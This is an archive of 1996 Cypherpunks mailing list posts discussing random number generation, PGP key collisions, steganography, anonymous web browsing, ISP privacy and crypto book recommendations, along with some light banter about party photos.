*									   		   																															                 *	
************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sun, 3 Mar 1996 00:58:37 +0800
To: Asgaard <asgaard@sos.sll.se>
Subject: Re: PARTY PICTURES!
Message-ID: <v01540b00ad5e28921804@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>>               http://www.c2.org/party/masquerade/
>
>OK, nice pictures of some interesting-looking people.
>But the only globally known participant featured is
>Eric Hughes; he is also the only one presented with
>a second name. For the others, it would be nice if
>you wrote clarifying texts, including crypto-anarchic
>relevance, in the way of:

[sniperoo]
>
>Asgaard

Maybe it wasn't made clear that all the pictures have been postprocessed
with an experimental version of PGP* to optically anonymize them, thus
protecting the identies of both the innocent and the guilty without bias.
Software problems triggered by Eric's neckware prevented the anonymizing
process from working properly in his case. Sources tell me that PRZ himself
was in many of the pictures, very nicely rendered as a classic marble and
rought-iron fireplace.

Steve

* PGP = Pretty Groovy Party

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 3 Mar 1996 00:07:14 +0800
To: cypherpunks@toad.com
Subject: Re: Learning about Cryptography
In-Reply-To: <v01510106ad5dcbdf9695@[206.196.98.125]>
Message-ID: <Ze26JD34w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


eggplant@inlink.com (eggplant) writes:
>
> I am interested in learning more about cryptography. Where could I obtain
> some good, recent books on cryptography for the beginner.

A number of people on this list will shout in unison, Schneier!, and they'll
probably be wrong.

For an absolute beginnger I'd suggest Abraham Sinkov, Elementary
Cryptanalysis, MAA: New mathematical library, ISBN 0-888385-622-0,
and Lawrence Dwight Smith, Cryptography, Dover, ISBN 0-486-20247-x.
If you want to learn more about the history of the field, try to
get the hardcover (unabridged) edition of David Kahn's _Codebreakers_.

(It might be a worthwhile project on run Kahn's book through an OCR
and to place it on Internet. :-)

If you want to understand the communication theory that underlies
modern cryptography, check out Dominic Welsh, Codes and Cryptography,
Oxford, ISBN 0-19-853287-3.

If you're teaching an undergraduate C course and are looking for examples
of badly written C code, then get Schneier's book. :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sun, 3 Mar 1996 00:29:16 +0800
To: gpowers@meaning.com
Subject: Re: Anonymous Web Browsing
In-Reply-To: <E8D9C4352A@st.vse.cz>
Message-ID: <Pine.3.89.9603021058.A298-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Mar 1996, Powers Glenn wrote:

> use netcom (or something similiar) that gives you dynamic ip 
> addresses. as a bonus, netcom doesn't require an actual name or 
> address. (yes, they require a CC#). this allows fairly anonymous 
> access. (prehaps one reason the neeed for web proxies isn't that high)

I wouldn't give Netcom my CC# if my life depended on it.  They have a 
really lousy record of people breaking in, stealing their lists of CC 
numbers, then Netcom trying to sweep it under the rug and not telling 
their users that their CC# was compromised.

Besides, their service really sucks, and their technical "support" 
doesn't exist.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Mar 1996 03:23:33 +0800
To: cypherpunks@toad.com
Subject: Netcom and Credit Cards
Message-ID: <ad5dd7c404021004aa7d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:32 PM 3/2/96, Dr. Dimitri Vulis wrote:
...
>(I'd never deal with an ISP who doesn't accept checks or money orders.
>And I mean checks, not automatic withdrawals from a checking account.)

For the record, Netcom has always accepted personal checks mailed in to
them. The credit card debit was offered as a convenience to those who
wanted it; it was and remains optional.

The "credit card numbers were stolen" point, that I believe Ed Carp was
referring to, had to do with the Mitnick affair, and is very old news.

I no longer use Netcom as my primary account, but thought some
misconceptions needed correcting.

I don't plan to debate the merits of Netcom, Mitnick, etc., and will post
no more on this topic.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Olcay Cirit <olcay@libtech.com>
Date: Sun, 3 Mar 1996 23:13:47 +0800
To: cypherpunks@toad.com
Subject: New PRNG method!
Message-ID: <199603021656.LAA13644@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello, All!

I was just thinking about how to generate random numbers,
when I hit upon an interesting idea:

If the internet is so huge and complex, why not, say, use 
the least significant bits of ping times from random internet 
hosts as seeds for a PRNG? (Practical Random Number Gen.)

You could then break the resulting binary value into 128-bit
blocks and modulus/xor each with a stream of random numbers taken
from a keyboard timing.

After all this, you could wash it with a secure symmetric 
cryptosystem such as idea in CBC mode.

Any thoughts, comments?

	-olcay

- --
"For he who lives more lives than one, |) Olcay Cirit -- olcay@libtech.com
   more deaths than one must die"      (| http://www.libtech.com/olo2.html

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTh9pCoZzwIn1bdtAQGuDAGA1QM1KyGQ2i6n9LLF00HrVn7OvBftesA9
+Jsu4W3yZothdL1pFQLt2v5l9mjgTspW
=2x/g
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sun, 3 Mar 1996 01:13:36 +0800
To: cypherpunks@toad.com
Subject: Re: PARTY PICTURES!
In-Reply-To: <v01540b00ad5e28921804@[206.86.1.35]>
Message-ID: <199603021657.LAA02030@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain



Unfortunately, the images are all inlined, making it impossible for text
browsers to view them. Cross-platform compatibility, indeed. All the
compatibility in the world won't help you if you don't use the features.

-- 
http://yakko.cs.wmich.edu/~frogfarm  ...for the best in unapproved information
Tell your friends 'n neighbors you read this on the evil pornographic Internet
"Where one burns books, one will also burn people eventually." -Heinrich Heine
People and books aren't for burning. No more Alexandrias, Auschwitzs or Wacos.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Sun, 3 Mar 1996 01:58:57 +0800
To: cypherpunks@toad.com
Subject: Re: Chaff in the Channel (Stealth PGP work)
In-Reply-To: <E87A6630BA@st.vse.cz>
Message-ID: <9603021720.AA04821@outland>
MIME-Version: 1.0
Content-Type: text/plain


>     the problem with many current stego programs (jsteg/stools) is 
> that given a data stream, they will tell you if there is data steg'ed 
> (by the same program, of course) it in. jsteg goes out of it's way to 
> hide it's content-length header, but jsteg can still detect jsteg 
> headers...

	Just a stab, but maybe this might work:  Get two picures of
with both at minimum sufficient size to carry the message.  Use the
lsb's (or any bit for that matter) of the second image to XOR with the
message before stego'ing (L'eggo my S'tego :) into the first.  Of course
you'ld have to arrange which bit in the pad image will be used, how to
associate the images, etc. before hand.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Sun, 3 Mar 1996 04:42:42 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics 9!
In-Reply-To: <Pine.SUN.3.91.960302151744.19252A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.960302122024.25069A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Mar 1996, Black Unicorn wrote:

> On Wed, 28 Feb 1996, jim bell wrote:
> 
> > "Assassination Politics" Part 9, by Jim Bell, February 27, 1996
> > 
> > For about a year I have been considering the implications of "Assassination 
> > Politics," and for more than six months I've been sharing the subject and 
> > my musings with you, the interested reader.
>                   ^^^^^^^^^^^^^^^^^^^^^^^^^^
> You're pushing it here.

No he's not. "Reader" is singular, and Jim is on cypherpunks.

-rich
 mumbling quietly to himself




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 6 Mar 1996 15:47:39 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Web Browsing
In-Reply-To: <Pine.3.89.9603021058.A298-0100000@dal1820.computek.net>
Message-ID: <wwB7JD38w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Little cryptographic relevance...

Ed Carp <erc@dal1820.computek.net> writes:
> I wouldn't give Netcom my CC# if my life depended on it.  They have a
> really lousy record of people breaking in, stealing their lists of CC
> numbers, then Netcom trying to sweep it under the rug and not telling
> their users that their CC# was compromised.
>
> Besides, their service really sucks, and their technical "support"
> doesn't exist.

I heard they have many more people using their system than it can handle,
so the response time is really bad.

Also several people complained that they tried to cancel a netcom account
and netcom kept on billing their credit card.

(I'd never deal with an ISP who doesn't accept checks or money orders.
And I mean checks, not automatic withdrawals from a checking account.)

dhp.com has been recommended to me as an ISP that respects its users privacy.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 3 Mar 1996 02:06:34 +0800
To: olcay@libtech.com (Olcay Cirit)
Subject: Re: New PRNG method!
In-Reply-To: <199603021656.LAA13644@bb.hks.net>
Message-ID: <199603021741.MAA16483@homeport.org>
MIME-Version: 1.0
Content-Type: text


	The fact that something is complex does not mean your end of
it can not be monitered.  You need to discover random numbers from
something very local to you, or your opponents can mess with your
numbers.  David Wagner posted something about how Mallet could muck
with your RNG if it was based on incoming packet checksums, back in
September.

	If you want good random numbers, track the mouse.  Don't go
looking outside your computer to things other computers do.

	Lastly, using collision-resistant hashing in considered
preferable to encrypting information.

Adam


Olcay Cirit wrote:

| If the internet is so huge and complex, why not, say, use
| the least significant bits of ping times from random internet
| hosts as seeds for a PRNG? (Practical Random Number Gen.)



| After all this, you could wash it with a secure symmetric
| cryptosystem such as idea in CBC mode.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Mar 1996 04:57:17 +0800
To: cypherpunks@toad.com
Subject: Re: Truelly Random Numbers
Message-ID: <ad5df17e0002100488bd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:11 PM 3/2/96, Adam Shostack wrote:
>A. Padgett Peterson P.E. Information Security wrote:

>| True however the current mechanism of generating PGP keys which consists
>| primarily of pseudo-randomly pounding on a keyboard is hardly "truely random.
>|
>| Have no idea of the true number but expect it to be significantly less than
>| that quoted above, even for a 1024 bit key like mine.
>
>        Accroding to Stephan Neuhaus's 'Statistical Properties of IDEA
>session keys in PGP,' the session keys are very well distributed, when
>tested for equidistribution and serial correlation.
>
>        This does not demonstrate that the RSA keys are as well
>distributed, but it does generate some confidence that the key
>generation methods of PGP are not very broken.  Testing for RSA
>generation would be more difficult, since there are some practical
>difficulties in getting a large sample of RSA private keys.

In some PK code I did several years ago in Mathematica, the primes for the
RSA modulus were found by picking a "random" (more on this later) starting
point and then counting up from there, testing for primality (actually,
pseudoprimality, technically). As one would expect, primes are found fairly
quickly.

The "randomness" of the resulting primes--and hence the randomness of the
modulus and hence the "RSA key"--is set by the randomness of the starting
point. With a reasonable amount of entropy, such as picking the next digit
from several keyboard timings, I expect the 150-decimal-digit number to be
*very* random!

(In fact, I'd venture that merely asking people to type in digits would
produce starting points that essentially would be very random...maybe some
clustering here and there, or an unequal number of digits, or too equal a
distribution, but adequate. An since an attacker could not know what the
sources of randomness were for some particular person, I doubt strongly
that factoring the modulus would be any easier.)

Suppose a =
4801747274372727828487361830183561393615106551195496693610351528409257572926
659
2027575902673957001560102249600798767153757681546836352857811107361291541511

(which is about 140-150 digits, "randomly" entered by me)

and p is computed as the first prime larger than this.

q found the same way

Now, is the modulus, n = pq, any more factorable than if a "more random"
source of p and q were used?

(I am actually asking this as a real question. Does anyone know if
factoring is significantly easier for such not-completely-random numbers? I
would expect that in theory it is, but in practice this is not a useful
point of entry into factoring n. Just a hunch.)

--Tim


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 6 Mar 1996 15:46:57 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: New PRNG method!
In-Reply-To: <199603021741.MAA16483@homeport.org>
Message-ID: <199603021754.MAA26203@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Olcay Cirit writes:
> PRNG? (Practical Random Number Gen.)

Incidentally, deliberately overloading a widely-used acronym with a 
similar (?) but distinct meaning is a Bad Thing, unless you're just out to 
confuse people.

Please, oh pretty please, consider reading some of the umpteen discussions
of proposed random and pseudorandom sources in the list archives and FAQs and 
books....    

-Lewis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Wed, 6 Mar 1996 10:45:24 +0800
To: cypherpunks@toad.com
Subject: Anonymous Web Browsing
Message-ID: <960302131308.20201e1e@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Realy two questions - will treat each in order

>        I have followed the ongoing discussion on PGP security, remailers
>and the like.  I am wondering if the current trend with interactive Web
>browsing, Java, etc, is not going to create a privacy problem every bit as
>significant as insecure e-mail.  As these "applets" become more
>sophisticated are we not going to have to face up to the issue of dynamic
>links to web sites that gather a lot of info from your computer as you
>interact with it? 

It is possible to design a "prophylactic" environment that would control
the interaction between your web browser and the PC. As was determined with
FV's keystroke monitor, it only worked because nothing prevented it, not
because nothing could prevent it. Such links can be prevented from
gathering information but I suspect it would be more creative to feed it
information that you would like others to believe.


>        My question is this:  Would it be possible to create a web site that
>would function along the same lines as remailers do?  Something that would
>allow a person to browse anonymously.

This is a different question. By nature, web transactions are interactive
which means that both sides must know how to reach each other. You could set
up a limited proxy and load it with the preferred information but I suspect
it would be easier to just send $20 and a requested username/password to a 
local provider for a PPP account. Would not be "anonymous" but if done 
carefully, the provider would not have to know who was using the account.

In the case of my local provider, no proof of my identity was ever required
and the entire set-up was done over the telephone (and I was not at home
at the time). Did not try to hide my identity but could have.


						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Mar 1996 06:12:35 +0800
To: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Subject: Re: Problems with certificates.
Message-ID: <199603022121.NAA10418@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:35 AM 3/1/96 -0500, "A. Padgett Peterson P.E. Information Security"
<PADGETT@hobbes.orl.mmc.com> wrote:
>Today, each person generates their own PGP key. While it is unlikely that
>any two will match, it is likely that at some point some two will match
>(see matching birthdays in a bar - number is less than you would think).

PGP KeyIDs are 8 hexes long (formerly 6), and there have been some natural
collisions and it's easy to manufacture them.  On the other hand,
the MD5 hash used for key fingerprints is 128 bits long, and
cryptographically strong.
So birthday-problem collisions occur when you have ~ 2**64 keys around,
which is not a problem, and you can't generate collisions on purpose either.
A 64-bit hash would be more interesting; you get collisions if you have
around 2**32 keys, which could actually happen.

>Next rage might well be "vanity" PGP keys. While at the moment it is not known
>how to create a specific match key to a sequence, if you generate enough
>keys, there will be some interesting sequences found. Possibly some PGP
>signatures will even be in violation of the CDA (now that should start a
rush 8*).

:-)  The main problem is the limitations of hex; keyids like 0xdeadbeef
are available, but it's tough to really trigger Exonization that way.
Using 32 bits as ASCII instead is a bit more flexible.

>For some time I have been concerned about the scalability of PGP. It works
>well in small groups but after trying once to create a 6,000 member keyring
>(took over three days on a 386 & was several meg when done) 

Yeah - lots of people have been concerned about this.  Keyservers
simplify the problem a lot, since you no longer need to carry a large
number of keys around yourself, but the keyring handling mechanism of PGP
wasn't designed to scale.  Wouldn't be too hard to redesign, once PGP 3.0
comes out and we've got tools to do it - you could use a database or decently
structured ASCII file or files.  And DNS or similar distributed keyserver
can make it easier to find, for people who are on-line.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Powers Glenn" <Q101NOW@st.vse.cz>
Date: Sat, 2 Mar 1996 20:41:46 +0800
To: cypherpunks@toad.com
Subject: Re: Chaff in the Channel (Stealth PGP work)
Message-ID: <E87A6630BA@st.vse.cz>
MIME-Version: 1.0
Content-Type: text/plain


-     However, I suspect that the ideal would be like cryptography:
- Assume the enemy knows everything about your system but the keys.
- Thus, your gifs need to look like normal gifs in the lsb.  Your audio
- needs to have normal levels of hiss in it.  Etc.

    the problem with many current stego programs (jsteg/stools) is 
that given a data stream, they will tell you if there is data steg'ed 
(by the same program, of course) it in. jsteg goes out of it's way to 
hide it's content-length header, but jsteg can still detect jsteg 
headers...

glenn




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sun, 3 Mar 1996 03:26:06 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptoanalysis
Message-ID: <960302132805.20201e1e@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>(I am amazed how little exists on the web on the topic.) I had seen a
>few of the books at a local bookstore, but I was uncertain of their quality.
>(They also had a number of snake-oil crypto books.)

Well, as soon as people can charge a cyber-dime/quarter/or buck to read/
download you will see a change. Most authors make little (like $1.00/copy)
from book sales so if made cheap enough so that is easier to download than 
pirate you will see a big change.


>The author has failed to call me back.  I do have some serious concerns
>about the code.  (There is not a single XOR used, except to clear
>registers!) 

Why bother (kind like reinventing ASCII), we have good, proven crypto
algorithms, some even in public domain. Is easy to code. Hard part is
making it fast and easy & available anywhere (what I like about the 
PGP enclyptor). Another hard part is good key management. Like computer
viruses in which there is nothing interesting about the propagation (what
makes a virus a virus), the crypto part is a done deal, have had good
stuff for years.

> I am starting to suspect that it is based on a mathematical
>progression based on the numbers 40, 28, 36.

Ah yes, being hearing impaired I always wanted a watch that would poke. My
1968 Seiko "Bellmatic" is close - ringing the bell makes it vibrate.


>I am trying to convince him of the futility of the task.  (It is hard as his
>ego keeps getting in the way.)  I just want to give him reasons why it is
>weak and not just glittering generalities.

Not futile, just already done. Should concentrate on things that are
"impossible" 8*).

						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Mar 1996 06:13:04 +0800
To: cypherpunks@toad.com
Subject: Re: Truly Random Numbers
Message-ID: <ad5e01180202100432e2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:26 PM 3/2/96, Adam Shostack wrote:
>        My expectation would be that your numbers are not random in a
>cryptographic sense, and that this route of attack is much less
>efficient than others that would be used.
>
>        I'll note that PGP does NOT take your data entered and convert
>it to numbers, but takes timings to choose a hard to predict starting
>point for its prime searching.

Yes, which is why I said this in my post:

"...With a reasonable amount of entropy, such as picking the next digit
from several keyboard timings, I expect the 150-decimal-digit number to be
*very* random!"


>        I'd expect this use of timings is better than using the large
>random number you entered, but in a theory sense only.  Both are
>pretty difficult; thats why we like large numbers. :)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Powers Glenn" <Q101NOW@st.vse.cz>
Date: Sun, 3 Mar 1996 08:10:28 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Web Browsing
Message-ID: <E8D9C4352A@st.vse.cz>
MIME-Version: 1.0
Content-Type: text/plain


- From:           tcmay@got.net (Timothy C. May)

- At 5:24 AM 3/2/96, dwhite@pris.bc.ca wrote:
- >        My question is this:  Would it be possible to create a web site that
- >would function along the same lines as remailers do?  Something that would
- >allow a person to browse anonymously.   So lets say I surfed into a

- Tim May writes:
- Your intuitions are correct, that protection steps are needed. The
- technology is developing, but the perceived need (anonymous browsing) is
- probably less than the perceived need for anonymous e-mail.

simple, not real secure solutions:

find a unix host, run the cern httpd server, turn on proxying, turn 
off logs. (about 10-15 minute setup) if this is not run often, it 
works well.

use netcom (or something similiar) that gives you dynamic ip 
addresses. as a bonus, netcom doesn't require an actual name or 
address. (yes, they require a CC#). this allows fairly anonymous 
access. (prehaps one reason the neeed for web proxies isn't that high)

glenn




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@wero.cs.byu.edu (Don)
Date: Sun, 3 Mar 1996 05:43:17 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Web Browsers
In-Reply-To: <960302143535.202017b7@hobbes.orl.mmc.com>
Message-ID: <m2zq9zi50x.fsf@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


The following message is a courtesy copy of an article
that has been posted as well.

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <960302143535.202017b7@hobbes.orl.mmc.com> PADGETT@hobbes.orl.mmc.com ("A. Padgett Peterson P.E. Information Security") writes:
>   Disabling is easy, just do not specify a mail server (or better, one that
>   will refuse mail) in "options/preferences/mail and news". Netscape (at least
>   1.1n) initiates a port 25 connection to the designated server to send mail.

I took the JavaScript stuff that was posted and put it in one of my web
pages (http://students.cs.byu.edu/~don/mail2news.html). I had to pick a new
address because support@netscape.com is reportedly now just an autoresponder.
I've disabled java, I've changed the mail server to null (from the default
localhost) and none of it stops the JavaScript from sending mail.

Don

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMTi3DMLa+QKZS485AQE06gL+N2kXHkygX1WycJFLcNOXD+jGLQQxNWXY
9XcVRUbxTh0lWcRx+nPxIXREBGlx9ip5FYYQ1ZHn3KpDOsN4Dm8JlFcwwo/mHxZo
BdRkCrtw+PviQZoesRK01udf9KI6O4Jv
=9GzS
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMTi3WMLa+QKZS485AQEqQgMAqMhWSzZ7bCMFTwyMaON6V+x1Tysv26AP
/QAp2emQ7D7Mt2zN4PYdkMTWiitKhRXQD+pELC3TmbHQ2zwo75mvMRYQo2sK+v4T
uK7LybYyp0MQwW9HXgVM232EGAvom6TC
=PsyM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sat, 2 Mar 1996 21:30:43 +0800
To: cypherpunks@toad.com
Subject: Re: PARTY PICTURES!
In-Reply-To: <Pine.SUN.3.91.960229120950.20892A-100000@crl.crl.com>
Message-ID: <Pine.HPP.3.91.960302134345.20123A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 29 Feb 1996, Sandy Sandfort wrote:

> 		http://www.c2.org/party/masquerade/

OK, nice pictures of some interesting-looking people.
But the only globally known participant featured is
Eric Hughes; he is also the only one presented with
a second name. For the others, it would be nice if
you wrote clarifying texts, including crypto-anarchic
relevance, in the way of:

'N.N., well known Java-programmer who wrote the Foo
 firewall-cracker.

 N.N., fanatical anarcho-capitalist with $2M in
 Cayman bank accounts.

 N.N., wife of N.N., cute and proficient at Word
 and Pagemaker, voted for Clinton.

 N.N., hardware salesman, boring but paid for the booze.

 N.N., as always out to get laid but didn't make it
 this time either.'

This would make the masquerade site so much more
interesting to us outsiders.


Asgaard

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sun, 3 Mar 1996 03:49:51 +0800
To: cypherpunks@toad.com
Subject: Truelly Random Numbers
Message-ID: <960302142608.202017b7@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>The number of randomly selected 768 bit primes that you would need for a
>reasonable chance of a birthday collision is 1.708E104

True however the current mechanism of generating PGP keys which consists 
primarily of pseudo-randomly pounding on a keyboard is hardly "truely random.

Have no idea of the true number but expect it to be significantly less than
that quoted above, even for a 1024 bit key like mine.
							Warmly,
								Padgett





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sun, 3 Mar 1996 03:55:12 +0800
To: cypherpunks@toad.com
Subject: Anonymous Web Browsers
Message-ID: <960302143535.202017b7@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


  
  >Note to Netscape people: Is it possible to have an option that will *always*
  >pop up a mail window and request confirmation before mail is sent out? Or
  >disable mailto altogether? It would be a lot easier than binary editing 
  >the executable to remove all the mailto strings...
  
  Disabling is easy, just do not specify a mail server (or better, one that
  will refuse mail) in "options/preferences/mail and news". Netscape (at least
  1.1n) initiates a port 25 connection to the designated server to send mail.
  
  						Warmly,
  							Padgett






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 3 Mar 1996 04:20:06 +0800
To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson P.E. Information Security)
Subject: Re: Truelly Random Numbers
In-Reply-To: <960302142608.202017b7@hobbes.orl.mmc.com>
Message-ID: <199603022011.PAA16975@homeport.org>
MIME-Version: 1.0
Content-Type: text


A. Padgett Peterson P.E. Information Security wrote:

| >The number of randomly selected 768 bit primes that you would need for a
| >reasonable chance of a birthday collision is 1.708E104
| 
| True however the current mechanism of generating PGP keys which consists 
| primarily of pseudo-randomly pounding on a keyboard is hardly "truely random.
| 
| Have no idea of the true number but expect it to be significantly less than
| that quoted above, even for a 1024 bit key like mine.

	Accroding to Stephan Neuhaus's 'Statistical Properties of IDEA
session keys in PGP,' the session keys are very well distributed, when
tested for equidistribution and serial correlation.

	This does not demonstrate that the RSA keys are as well
distributed, but it does generate some confidence that the key
generation methods of PGP are not very broken.  Testing for RSA
generation would be more difficult, since there are some practical
difficulties in getting a large sample of RSA private keys.

Stephan Neuhaus is neuhaus@informatik.uni-kl.de.  He has a long (24
page), and short (8? page) version of the paper available.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Mar 1996 04:34:36 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Assassination Politics 9!
In-Reply-To: <m0ts143-00090tC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960302151744.19252A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Feb 1996, jim bell wrote:

> "Assassination Politics" Part 9, by Jim Bell, February 27, 1996
> 
> For about a year I have been considering the implications of "Assassination 
> Politics," and for more than six months I've been sharing the subject and my 
> musings with you, the interested reader.
               ^^^^^^^^^^^^^^^^^^^^^^^^^^
You're pushing it here.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
